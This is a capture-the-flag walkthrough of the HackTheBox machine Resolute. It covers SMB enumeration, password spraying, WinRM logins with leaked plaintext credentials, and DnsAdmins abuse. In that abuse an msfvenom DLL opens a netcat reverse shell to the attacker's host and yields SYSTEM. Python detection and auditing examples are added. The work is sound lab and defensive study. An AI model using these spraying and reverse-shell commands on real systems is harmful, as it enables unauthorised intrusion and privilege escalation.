HackTheBox - Resolute


Resolute was a fun 30 point box created by egre55. It starts out by finding a set of credentials via SMB enumeration which allows you to password spray and find that the password has been reused, allowing you to log in via WinRM and get the user flag. You then find a set of credentials in a PowerShell Transcript file, log in again via WinRM with those credentials, and then finally abuse the user’s group privileges to get root.

User.txt

Nmap


A quick nmap scan reveals the following ports:

# nmap -sT -p- --min-rate 5000 10.10.10.169
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 15:20 EST
Nmap scan report for 10.10.10.169
Host is up (0.017s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm

Focusing on the more important ports we get the following information:

# nmap -sV -sC -T4 -p 53,88,135,139,389,445 10.10.10.169

PORT    STATE SERVICE      VERSION
53/tcp  open  domain?
| fingerprint-strings:    
|   DNSVersionBindReqTCP: 
|     version                        
|_    bind             
88/tcp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-11 20:33:30Z)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)

Host script results:
|_clock-skew: mean: 2h46m57s, deviation: 4h37m09s, median: 6m56s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-01-11T12:34:03-08:00 
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required 
| smb2-time: 
|   date: 2020-01-11T20:34:05
|_  start_date: 2020-01-11T11:05:42


SMB


Running nullinux with the -users flag presents you with a list of users and their associated group memberships:

# nullinux -users 10.10.10.169 

[*] Enumerating Domain Information for: 10.10.10.169
[+] Domain Name: MEGABANK
[+] Domain SID: S-1-5-21-1392959593-3013219662-3596683436

[*] Enumerating querydispinfo for: 10.10.10.169
    abigail
    Administrator
    angela
    annette
    annika
    claire
    claude
    DefaultAccount
    felicia
    fred
    Guest
    gustavo
    krbtgt
    marcus
    marko
    melanie
    naoki
    paulo
    per
    ryan
    sally
    simon
    steve
    stevie
    sunita
    ulf
    zach

[*] Enumerating enumdomusers for: 10.10.10.169
    Administrator
    Guest
    krbtgt
    DefaultAccount
    ryan
    marko
    sunita
    abigail
    marcus
    sally
    fred
    angela
    felicia
    gustavo
    ulf
    stevie
    claire
    paulo
    steve
    annette
    annika
    per
    claude
    melanie
    zach
    simon
    naoki

[*] Enumerating LSA for: 10.10.10.169

[*] Performing RID Cycling for: 10.10.10.169

[*] Testing 10.10.10.169 for Known Users

[*] Enumerating Group Memberships for: 10.10.10.169
[+] Group: Enterprise Read-only Domain Controllers
[+] Group: Domain Admins
    Administrator
[+] Group: Domain Users
    Administrator
    DefaultAccount
    krbtgt
    ryan
    marko
    sunita
    abigail
    marcus
    sally
    fred
    angela
    felicia
    gustavo
    ulf
    stevie
    claire
    paulo
    steve
    annette
    annika
    per
    claude
    melanie
    zach
    simon
    naoki
[+] Group: Domain Guests
    Guest
[+] Group: Domain Computers
    MS02$
[+] Group: Domain Controllers
    RESOLUTE$
[+] Group: Schema Admins
    Administrator
[+] Group: Enterprise Admins
    Administrator
[+] Group: Group Policy Creator Owners
    Administrator
[+] Group: Read-only Domain Controllers
[+] Group: Cloneable Domain Controllers
[+] Group: Protected Users
[+] Group: Key Admins
[+] Group: Enterprise Key Admins
[+] Group: DnsUpdateProxy
[+] Group: Contractors
    ryan

Make note of the user ryan in the Contractors group.

Enumerating SMB further, I ran enum4linux, which provided some interesting information in the account description field of one of the users:

# enum4linux -a 10.10.10.169

 =============================          
|    Users on 10.10.10.169    |      
 =============================    
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
<REDACTED>
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)        
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!    
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)         
<REDACTED>

You can see the marko account Desc contains Account created. Password set to Welcome123!.


Password Spraying


Unsurprisingly, the credentials marko / Welcome123! didn’t work for any of the services (Kerberos, SMB, and WinRM), but we can password spray with crackmapexec and see whether the password has been reused elsewhere.

I added all the users from the nullinux output into a file and passed it to the -u flag of crackmapexec:

# crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'
CME          10.10.10.169:445 RESOLUTE        [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:MEGABANK)
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\Administrator:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\ryan:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\marko:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\sunita:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\abigail:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\marcus:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\sally:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\fred:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\angela:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\felicia:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\gustavo:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\ulf:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\stevie:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\claire:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\paulo:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\steve:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\annette:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\annika:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\per:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\claude:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [+] MEGABANK\melanie:Welcome123!
[*] KTHXBYE!

You can see the credentials melanie / Welcome123! succeeded.
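From the defensive side, the same spray is visible as one source failing logons against many distinct accounts in a short window, followed by a single success. The Python below is an added example, not part of this write-up: it assumes logon events have already been exported as (timestamp, source, account, outcome) tuples (for instance from Security events 4625/4624 on the domain controller) and uses a constructed event list that mirrors the crackmapexec run above.

```python
"""Flag password-spray behaviour in failed-logon telemetry.

Added example, not part of the original write-up. Input is a list of
(timestamp, source, account, outcome) tuples; the records built below are
constructed to mimic the spray shown on the page.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Accounts the constructed spraying host tries, in order (names from the page).
SPRAYED_ACCOUNTS = ["Administrator", "ryan", "marko", "sunita", "abigail",
                    "marcus", "sally", "fred", "angela", "felicia", "gustavo",
                    "ulf", "melanie"]


def constructed_events():
    """One host tries a single password against many accounts within seconds
    and eventually succeeds; a second host is a user mistyping their own
    password a few times over ten minutes (should not be flagged)."""
    t0 = datetime(2020, 1, 11, 20, 40, 0)
    events = []
    for i, account in enumerate(SPRAYED_ACCOUNTS):
        outcome = "SUCCESS" if account == "melanie" else "FAIL"
        events.append((t0 + timedelta(seconds=i), "10.10.14.45", account, outcome))
    for i in range(3):
        events.append((t0 + timedelta(minutes=3 * i), "10.10.10.50", "claire", "FAIL"))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source: summary} for every source that failed logons against
    at least `min_accounts` distinct accounts inside any `window`.

    The summary also lists accounts that succeeded from the same source,
    which are the first credentials to reset after a spray."""
    by_source = defaultdict(list)
    for ts, source, account, outcome in events:
        by_source[source].append((ts, account, outcome))

    findings = {}
    for source, rows in by_source.items():
        rows.sort()  # chronological; tuples sort on the datetime first
        for ts, _, _ in rows:
            recent = [r for r in rows if ts - window <= r[0] <= ts]
            failed = {a for _, a, o in recent if o == "FAIL"}
            if len(failed) >= min_accounts:
                findings[source] = {
                    "distinct_failed_accounts": len({a for _, a, o in rows if o == "FAIL"}),
                    "successful_logons": sorted({a for _, a, o in rows if o == "SUCCESS"}),
                }
                break  # one finding per source is enough
    return findings


if __name__ == "__main__":
    for source, summary in detect_spray(constructed_events()).items():
        print(source, summary)
```

The window and account threshold are the two knobs to tune: a spray that is slowed down to stay under a lockout policy will need a longer window, at the cost of catching help-desk sources that legitimately touch many accounts.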


Flag


You can simply WinRM into Resolute and type the user flag:

# evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
*Evil-WinRM* PS C:\Users\melanie\desktop> type user.txt
0c3be4...


Root.txt

PowerShell Transcripts


Running dir -Force allows you to list hidden files and directories:

*Evil-WinRM* PS C:\> dir -force

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/29/2020   3:47 AM      402653184 pagefile.sys

You’ll notice a PSTranscripts directory in C:\. PowerShell Transcripts allow you to record all or part of a PowerShell session to a text file, including all the commands the user typed as well as any output that appeared on the console.

The PSTranscripts directory contains another hidden directory:

*Evil-WinRM* PS C:\PSTranscripts> dir -force

    Directory: C:\PSTranscripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203

Changing directory and checking for more hidden files, we can see the following transcript is present:

*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force

    Directory: C:\PSTranscripts\20191203

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

The file contains some interesting information but the main line that stands out is shown below:

>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
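Transcription writes every command line to disk verbatim, so a defender who enables it should also scan the transcript directory for commands that carried secrets inline. The Python below is an added example, not code from this write-up; the transcript text and the placeholder passwords in it are constructed, with the net use line modelled on the one found on the box.

```python
"""Scan a PowerShell transcript for commands that embedded a secret.

Added example, not part of the original write-up. The transcript below is
constructed; every value ending in -CONSTRUCTED is a placeholder.
"""
import re

TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
**********************
PS>Get-Service DNS
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups Pa55-CONSTRUCTED /user:MEGABANK\ryan"
PS>$sec = ConvertTo-SecureString 'Sup3r-CONSTRUCTED' -AsPlainText -Force
PS>schtasks /create /tn Backup /tr backup.cmd /sc daily /ru MEGABANK\svc_bkp /rp Rp-CONSTRUCTED
PS>Get-ChildItem C:\PSTranscripts
**********************
Windows PowerShell transcript end
**********************
"""

# (rule name, pattern). Each pattern names a `secret` group so the finding
# can be redacted before it is forwarded to a ticket or SIEM.
RULES = [
    # net use takes the password positionally after the share, so everything
    # after the share is treated as sensitive (the argument order on the box
    # differed, which is another reason to redact the whole tail).
    ("net use with inline credentials",
     re.compile(r"net\s+use\s+\S+\s+\\\\\S+\s+(?P<secret>.+)", re.I)),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(?P<secret>'[^']*'|\"[^\"]*\"|\S+)(?=\s+-AsPlainText)", re.I)),
    ("password switch (-Password / schtasks /rp)",
     re.compile(r"(?:-Password|/rp)\s+(?P<secret>\S+)", re.I)),
]


def scan_transcript(text):
    """Return one finding per matching rule and line, with the secret masked."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            m = pattern.search(line)
            if m:
                redacted = line[:m.start("secret")] + "<redacted>" + line[m.end("secret"):]
                findings.append({"line": lineno, "rule": name, "redacted": redacted})
    return findings


if __name__ == "__main__":
    for f in scan_transcript(TRANSCRIPT):
        print(f"line {f['line']:>3} [{f['rule']}] {f['redacted']}")
```

The rules are deliberately narrow; the point is to report where a secret landed on disk without copying it into yet another log, which is why findings carry the redacted line rather than the match.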


Shell as Ryan


With Ryan’s credentials we can simply log in again via WinRM:

# evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan


Groups


Running whoami /all as ryan presents some interesting output, particularly in the GROUP INFORMATION section:

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

<REDACTED>

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== =============================================================== 
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group 
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


<REDACTED>

You can see that ryan is a member of Contractors and DnsAdmins.

The DnsAdmins group has a well-known weakness that allows a member to make the DNS service load an arbitrary DLL, including one served from a remote share, and so achieve code execution as the service account. A great article from ired.team can be found here, it describes the exploitation process in a simple and concise manner.


Nested Groups


It appears Contractors is a nested group; this can be confirmed with the following command:

*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ADGroupMember -Identity 'DnsAdmins'

distinguishedName : CN=Contractors,OU=Groups,DC=megabank,DC=local
name              : Contractors
objectClass       : group
objectGUID        : 9f2ff7be-f805-491f-aff1-3653653874d7
SamAccountName    : Contractors
SID               : S-1-5-21-1392959593-3013219662-3596683436-1103

Contractors is nested inside the DnsAdmins group, and ryan is a member of Contractors, so he effectively holds DnsAdmins group privileges. The easy way to show nested group members is by using the -Recursive flag:

*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ADGroupMember -Identity 'DnsAdmins' -Recursive

distinguishedName : CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
name              : Ryan Bertrand
objectClass       : user
objectGUID        : 848c83e3-6cbe-4d3e-bacf-aa7bd37da691
SamAccountName    : ryan
SID               : S-1-5-21-1392959593-3013219662-3596683436-1105

With that confirmed let’s move on to the dns service itself.
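The -Recursive flag resolves transitive membership; the same walk is worth scripting when auditing sensitive groups across a whole directory, since a user like ryan never appears in the direct member list of DnsAdmins. The Python below is an added example, not part of the write-up: the DIRECTORY map is a constructed stand-in for the objects on the box (a real run would populate it from the LDAP member attributes), and it includes a circular nesting, which AD permits, to show why the walk needs a visited set.

```python
"""Resolve transitive group membership the way Get-ADGroupMember -Recursive
and a logon token do.

Added example, not from the original write-up. DIRECTORY is constructed:
sAMAccountName -> (objectClass, direct members). DnsAdmins -> Contractors
-> ryan mirrors the page; Helpdesk and Tier2 form a deliberate cycle.
"""
from collections import deque

DIRECTORY = {
    "DnsAdmins": ("group", ["Contractors"]),
    "Contractors": ("group", ["ryan"]),
    "Domain Admins": ("group", ["Administrator"]),
    "Remote Management Users": ("group", ["ryan", "melanie"]),
    "Helpdesk": ("group", ["Tier2"]),
    "Tier2": ("group", ["Helpdesk", "melanie"]),
    "ryan": ("user", []),
    "melanie": ("user", []),
    "Administrator": ("user", []),
}


def effective_members(group, directory=DIRECTORY):
    """All user objects reachable from `group` through nested groups."""
    seen, users = {group}, set()
    queue = deque([group])
    while queue:
        current = queue.popleft()
        for member in directory.get(current, ("group", []))[1]:
            if member in seen:       # cycle or diamond: already expanded
                continue
            seen.add(member)
            if directory.get(member, ("user", []))[0] == "group":
                queue.append(member)
            else:
                users.add(member)
    return sorted(users)


def effective_groups(principal, directory=DIRECTORY):
    """Every group whose SID `principal`'s token would carry (the whoami /all view)."""
    parents = {}
    for name, (cls, members) in directory.items():
        if cls == "group":
            for m in members:
                parents.setdefault(m, []).append(name)
    seen = set()
    queue = deque([principal])
    while queue:
        for g in parents.get(queue.popleft(), []):
            if g not in seen:
                seen.add(g)
                queue.append(g)
    return sorted(seen)


def audit_privileged_groups(groups, directory=DIRECTORY):
    """Map each sensitive group to the users who effectively hold it, so that
    indirect members like ryan do not hide behind an intermediate group."""
    return {g: effective_members(g, directory) for g in groups}


if __name__ == "__main__":
    print(audit_privileged_groups(["DnsAdmins", "Domain Admins"]))
    print("ryan's effective groups:", effective_groups("ryan"))
```

Running the audit over the groups Microsoft documents as privileged (DnsAdmins among them) and diffing the result between runs is a cheap way to catch a nesting change like the Contractors one before it becomes a finding in someone else's write-up.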


dns service


Before attempting the exploit I wanted to check the permissions our user has over the dns service by getting the SDDL security descriptor:

C:\>sc sdShow dns

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105) 

I created a short post recently covering SDDL security descriptors, in particular for service permissions. The ACE structure is as follows:

(ace_type; ace_flags; rights; object_guid; inherit_object_guid; account_sid)

You’ll notice the SID in the last ACE matches Ryan Bertrand’s SID:

(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)

The following table contains the rights for the service:

Symbol  Right
------  -----
CC      SERVICE_QUERY_CONFIG
LC      SERVICE_QUERY_STATUS
SW      SERVICE_ENUMERATE_DEPENDENTS
RP      SERVICE_START
WP      SERVICE_STOP
DT      SERVICE_PAUSE_CONTINUE
LO      SERVICE_INTERROGATE
RC      READ_CONTROL

Comparing the rights in the ACE against the table tells us exactly what a user can do to a service. The rights that matter in this instance are RP and WP: ryan is able to stop and start the dns service.
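A small decoder makes descriptors like the one above readable at a glance. The Python below is an added example, not part of this write-up; it covers the eight codes in the table plus the other standard codes present in the dns descriptor (DC, CR, SD, WD, WO), maps the two-letter SID aliases to their well-known principals, and then answers the question that matters here: who is allowed to stop and start the service.

```python
"""Decode a service SDDL string such as the one returned by `sc sdshow dns`.

Added example for this write-up, not part of the original post. The rights
table extends the page's with the other standard service codes; the SID
aliases are the documented SDDL abbreviations.
"""
import re

SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG",
    "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START",
    "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE",
    "RC": "READ_CONTROL",
    "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER",
}

WELL_KNOWN_SIDS = {
    "SY": "NT AUTHORITY\\SYSTEM",
    "BA": "BUILTIN\\Administrators",
    "IU": "NT AUTHORITY\\INTERACTIVE",
    "SU": "NT AUTHORITY\\SERVICE",
    "SO": "BUILTIN\\Server Operators",
}

# Sample input: the descriptor the write-up obtained for the dns service.
DNS_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
            "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
            "(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)")

ACE_RE = re.compile(r"\(([^)]*)\)")


def expand_rights(rights):
    """Turn 'LCRPWP' into named rights; unknown codes are kept verbatim."""
    if rights.startswith("0x"):
        return [rights]  # raw hex access mask, left undecoded here
    pairs = [rights[i:i + 2] for i in range(0, len(rights), 2)]
    return [SERVICE_RIGHTS.get(code, code) for code in pairs]


def parse_service_sddl(sddl):
    """Return the DACL as a list of ACE dicts in descriptor order."""
    if "D:" not in sddl:
        raise ValueError("descriptor has no DACL (D:) section")
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # drop a trailing SACL
    aces = []
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, ace_flags, rights, _object_guid, _inherit_guid, sid = fields
        aces.append({
            "type": {"A": "ALLOW", "D": "DENY"}.get(ace_type, ace_type),
            "flags": ace_flags,
            "rights": expand_rights(rights),
            "principal": WELL_KNOWN_SIDS.get(sid, sid),
        })
    return aces


def who_can_restart(sddl):
    """Principals allowed both SERVICE_START and SERVICE_STOP; a deny ACE on
    either right removes the principal from the result."""
    allowed, denied = set(), set()
    for ace in parse_service_sddl(sddl):
        rights = set(ace["rights"])
        if ace["type"] == "ALLOW" and {"SERVICE_START", "SERVICE_STOP"} <= rights:
            allowed.add(ace["principal"])
        if ace["type"] == "DENY" and rights & {"SERVICE_START", "SERVICE_STOP"}:
            denied.add(ace["principal"])
    return sorted(allowed - denied)


if __name__ == "__main__":
    for ace in parse_service_sddl(DNS_SDDL):
        print(f"{ace['type']:5} {ace['principal']:48} {' '.join(ace['rights'])}")
    print("can stop/start:", who_can_restart(DNS_SDDL))
```

Run against the descriptors of every service on a domain controller, the last function is a quick audit for non-administrative SIDs that can bounce a service; on this box it returns ryan's SID alongside SYSTEM, Administrators and Server Operators.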


DnsAdmins


As described by Microsoft:

Members of DNSAdmins group have access to network DNS information. The default permissions are as follows: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group exists only if the DNS server role is or was once installed on a domain controller in the domain.

The management of the DNS service is done using the DNS Server Management Protocol:

The Domain Name Service (DNS) Server Management Protocol defines RPC interfaces that provide methods for remotely accessing and administering a DNS server. It is a client/server protocol based on RPC that is used in the configuration, management, and monitoring of a DNS server.

The Microsoft tool dnscmd is a command-line interface for managing DNS servers. This tool will allow us to make a specific change to the DNS server’s /serverlevelplugindll parameter, which specifies the path of a custom plug-in.

The syntax is /serverlevelplugindll <dllpath>, with dllpath specifying the fully qualified path name of a valid DNS server plug-in. We can pass a UNC path to this parameter, allowing us to load a custom DLL from our remote host.

The original research on this attack was written up by Shay Ber and describes it in great detail; the article can be found here.


Exploiting DnsAdmins


Referring to the ired.team article, the exploit process I used is shown below.

First, I uploaded nc64.exe to a world writable directory - C:\programdata. I then created a simple DLL with msfvenom that runs a nc reverse shell:

# msfvenom -p windows/x64/exec cmd='C:\programdata\nc64.exe 10.10.14.45 443 -e cmd.exe' -f dll > nc.dll

Next, I configured the dns service to use this new remote DLL located on my attacking host (using the FQDN from running Get-ADComputer -Filter *):

dnscmd Resolute.megabank.local /config /serverlevelplugindll \\10.10.14.45\reso\nc.dll

After that you can double check it configured successfully:

Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

ServerLevelPluginDll : \\10.10.14.45\reso\nc.dll
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ 
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName          : Parameters
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry

I then started a local SMB server using the smbserver.py script from Impacket (making sure the nc.dll is in the correct share):

# python smbserver.py reso /root/reso

Then you simply need to stop and start the dns service:

sc.exe \\Resolute.megabank.local stop dns
sc.exe query dns 
sc.exe \\Resolute.megabank.local start dns

You should receive output like the following in the smbserver.py terminal:

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,53729)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:7e044e15e6bafcdee2496aec467f2908:0101000000000000808bb4567fc9d501f473f5841e6b768a00000000010010006a0079004500510043006a0064006b000200 
100079006c0073004c00610049004c006d00030010006a0079004500510043006a0064006b000400100079006c0073004c00610049004c006d0007000800808bb4567fc9d5010600040002000000080030003000000000 
000000000000000040000014da554f47382d1774e0f1ec3fb500b69d0e2a875f126a359ad6d37aef84b82b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e0031003000 
2e00310034002e00340035000000000000000000 
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:RESO)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.169,53729)
[*] Remaining connections []

This confirms that the dns service has hit our smbserver and grabbed the DLL. You should then receive a netcat reverse shell fairly quickly:

# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.169] 56589
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system


Flag


With a shell as SYSTEM you can simply type the root flag:

C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d948...